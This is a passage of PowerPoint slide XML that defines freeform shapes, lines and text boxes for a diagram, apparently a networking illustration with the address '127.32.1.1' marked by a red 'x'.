                    <a:gd name="T3" fmla="*/ 0 h 59"/>
                    <a:gd name="T4" fmla="*/ 108 w 108"/>
                    <a:gd name="T5" fmla="*/ 59 h 59"/>
                    <a:gd name="T6" fmla="*/ 0 w 108"/>
                    <a:gd name="T7" fmla="*/ 59 h 59"/>
                    <a:gd name="T8" fmla="*/ 1 w 108"/>
                    <a:gd name="T9" fmla="*/ 1 h 59"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 108"/>
                    <a:gd name="T16" fmla="*/ 0 h 59"/>
                    <a:gd name="T17" fmla="*/ 108 w 108"/>
                    <a:gd name="T18" fmla="*/ 59 h 59"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="108" h="59">
                      <a:moveTo>
                        <a:pt x="1" y="1"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="108" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="108" y="59"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="59"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1" y="1"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="E0E0E0"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10917" name="Freeform 323"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2551" y="2912"/>
                  <a:ext cx="172" cy="131"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 172"/>
                    <a:gd name="T1" fmla="*/ 0 h 131"/>
                    <a:gd name="T2" fmla="*/ 0 w 172"/>
                    <a:gd name="T3" fmla="*/ 45 h 131"/>
                    <a:gd name="T4" fmla="*/ 172 w 172"/>
                    <a:gd name="T5" fmla="*/ 131 h 131"/>
                    <a:gd name="T6" fmla="*/ 172 w 172"/>
                    <a:gd name="T7" fmla="*/ 73 h 131"/>
                    <a:gd name="T8" fmla="*/ 0 w 172"/>
                    <a:gd name="T9" fmla="*/ 0 h 131"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 172"/>
                    <a:gd name="T16" fmla="*/ 0 h 131"/>
                    <a:gd name="T17" fmla="*/ 172 w 172"/>
                    <a:gd name="T18" fmla="*/ 131 h 131"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="172" h="131">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="45"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="172" y="131"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="172" y="73"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="A0A0A0"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10807" name="Line 324"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3208" y="2768"/>
                <a:ext cx="408" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10247" name="Group 325"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3683000" y="2146300"/>
            <a:ext cx="2205037" cy="738188"/>
            <a:chOff x="1993" y="2193"/>
            <a:chExt cx="976" cy="327"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10596" name="Text Box 326"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1993" y="2246"/>
              <a:ext cx="699" cy="198"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="15875">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2300">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>127.32.1.1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10597" name="Line 327"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2654" y="2351"/>
              <a:ext cx="156" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10598" name="Text Box 328"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2762" y="2193"/>
              <a:ext cx="207" cy="327"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>x</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10248" name="Freeform 329"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1158875" y="5756275"/>
            <a:ext cx="5221287" cy="2549525"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T66" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T68" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T70" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T71" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T72" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T73" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T74" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T75" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T76" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T77" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T78" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T79" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T80" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T81" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T82" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T83" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T84" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T85" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T86" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T87" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T88" fmla="*/ 0 w 1672"/>
              <a:gd name="T89" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T90" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T91" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T92" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T93" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T94" fmla="*/ 0 w 1672"/>
              <a:gd name="T95" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T96" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T97" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T98" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T99" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T100" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T101" fmla="*/ 2147483647 h 977"/>
              <a:gd name="T102" fmla="*/ 2147483647 w 1672"/>
              <a:gd name="T103" fmla="*/ 2147483647 h 9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72"/>
              <a:gd name="T157" fmla="*/ 0 h 977"/>
              <a:gd name="T158" fmla="*/ 1672 w 1672"/>
              <a:gd name="T159" fmla="*/ 977 h 9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72" h="977">
                <a:moveTo>
                  <a:pt x="54" y="16"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="57" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="105" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="127" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="138" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="149" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="200" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="212" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="225" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="281" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="309" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="338" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="352" y="82"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="366" y="86"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="380" y="90"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394" y="95"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="408" y="97"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="422" y="100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="436" y="103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="451" y="104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="465" y="105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="477" y="105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="491" y="105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="504" y="105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="518" y="104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="532" y="104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="559" y="100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="586" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="614" y="95"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="641" y="90"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="670" y="86"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="698" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="727" y="79"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="757" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="774" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="789" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="804" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="820" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="837" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="853" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="871" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="888" y="79"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="906" y="82"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="923" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="942" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="961" y="91"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="980" y="95"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1003" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1024" y="102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1046" y="106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1069" y="110"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1092" y="114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1117" y="119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1141" y="124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1190" y="134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1239" y="146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1288" y="159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1313" y="166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1337" y="173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1361" y="180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1384" y="187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1406" y="195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1429" y="203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1450" y="211"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1471" y="220"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1490" y="229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1509" y="238"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1527" y="248"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1535" y="252"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1543" y="258"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1551" y="263"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1558" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1565" y="273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1572" y="279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1579" y="284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1585" y="290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1591" y="296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1597" y="301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1607" y="313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1616" y="326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1625" y="340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1633" y="355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1640" y="370"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1647" y="385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1651" y="403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1656" y="419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1661" y="438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1664" y="456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1667" y="474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1669" y="493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1671" y="512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1671" y="530"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1672" y="550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1671" y="569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1671" y="588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1670" y="607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1668" y="626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1665" y="645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1663" y="662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1660" y="680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1656" y="697"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1651" y="715"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1648" y="731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1643" y="747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1637" y="762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1632" y="776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1626" y="790"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1620" y="803"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1614" y="814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1607" y="825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1600" y="834"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1592" y="843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1584" y="852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1574" y="859"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1564" y="867"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1553" y="873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1543" y="879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1531" y="884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1518" y="890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1506" y="895"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1493" y="898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1479" y="902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1465" y="905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1451" y="909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1436" y="912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1420" y="915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1390" y="919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1358" y="923"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1326" y="926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1293" y="930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1259" y="932"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1227" y="936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1194" y="939"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1162" y="944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1146" y="946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1130" y="949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1112" y="950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1095" y="952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1077" y="954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1059" y="956"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1041" y="958"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1022" y="959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="984" y="963"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="945" y="966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="907" y="969"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="867" y="970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="829" y="972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="791" y="973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="773" y="974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="754" y="974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="736" y="976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="718" y="976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="701" y="976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="684" y="977"/>
                </a:lnTo>
                <a:lnTo>
